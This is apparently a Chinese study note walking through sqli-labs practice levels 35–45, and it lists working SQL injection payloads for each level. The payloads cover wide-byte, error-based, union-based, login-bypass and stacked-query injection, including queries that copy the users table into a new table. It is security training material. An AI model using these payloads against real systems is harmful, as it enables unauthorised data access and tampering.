sqllab第35-45关通关笔记

35关知识点:
  • 宽字节注入
  • 数值型注入
  • 错误注入
    • payload:id=1+and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0+union+select+1,database(),version()--+
36关知识点:
  • 字符型注入
  • 宽字节注入
  • 错误注入
    • payload:id=1%df%27and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0%df%27union+select+1,database(),version()--+
37关知识点:
  • 宽字节注入(bp抓包实现,不要直接在输入框中输入下面payload)
  • 字符型注入
  • 联合注入
    • payload:uname=1%df'union+select+database(),version()--+
  • 错误注入
    • payload:uname=1%df'and+extractvalue(1,concat(0x7e,database(),0x7e))--+
38关知识点:
  • 字符型注入+单引号闭合
  • 错误注入
    • payload:id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
  • 联合注入
    • payload:id=0%27union+select+1,database(),version()--+
39关知识点:
  • 数值型注入
  • 错误注入
    • payload:id=1+and%20extractvalue(1,concat(0x7e,database(),0x7e))=0
  • 联合注入
    • payload:id=0+union+select+1,version(),database()
40关知识点:
  • 字符型注入
    • 测试发现原始语句是 where id=('输入')
  • 联合注入
    • payload:id=0%27)union+select+1,database(),3%20and+1=(%271
  • 没有回显信息,不能进行错误注入
41关知识点:
  • 数值型注入
  • 联合注入
    • payload:id=0%20union+select+1,database(),version()
  • 没有回显信息,不能进行错误注入
  • 堆叠注入
    • payload:id=1;create%20table%20ren(id%20int);--+
42关知识点:
  • 密码位置可以单引号绕过
    • payload:passwd='or+1=1#
  • 堆叠注入
    • payload:passwd=';create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=';insert into ren select * from users;# (将users的内容插入到ren表中)
43关知识点:
  • 密码处读取输入为 where passwd=('输入')
    • payload:passwd=1')or 1=1#
  • 堆叠注入
    • payload:passwd=');create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=');insert into ren select * from users;# (将users的内容插入到ren表中)
44关知识点:
  • 和42关的payload一模一样
  • 直接过了
45关知识点:
  • 和43关一样的payload
  • 直接过了

10

相关推荐
一只小菜鸡..7 小时前
Stanford CS144 学习笔记 (四):网络拥塞控制与 AIMD 算法
网络·笔记·学习
Hammer_Hans8 小时前
DFT笔记82
笔记
xuhaoyu_cpp_java8 小时前
SpringBoot学习(四)
java·经验分享·spring boot·笔记·学习
依然范特东9 小时前
动手学深度学习笔记--训练注意、梯度问题
人工智能·笔记·深度学习
fanchenxinok11 小时前
学习笔记:LabVIEW中如何将解析S19/HEX的VI封装为子VI并供主VI调用
笔记·学习·labview·子vi
我超膨胀der.11 小时前
LABVIEW快捷键学习
笔记·labview
2301_8090511411 小时前
基本电子电路元件 学习笔记
笔记·学习
一只小菜鸡..13 小时前
Stanford CS144 学习笔记 (二):传输层与数据通信机制
网络·笔记·学习
zyplayer-doc14 小时前
个人 AI 知识库怎么搭建:用 zyplayer-doc 把笔记、PDF 和图片资料变成可问答的第二大脑
大数据·开发语言·人工智能·笔记·pdf·ocr
Yunzenn14 小时前
强化学习1-Liu2026_GFlowRL_精读笔记
人工智能·笔记·深度学习·机器学习·transformer·集成学习·vllm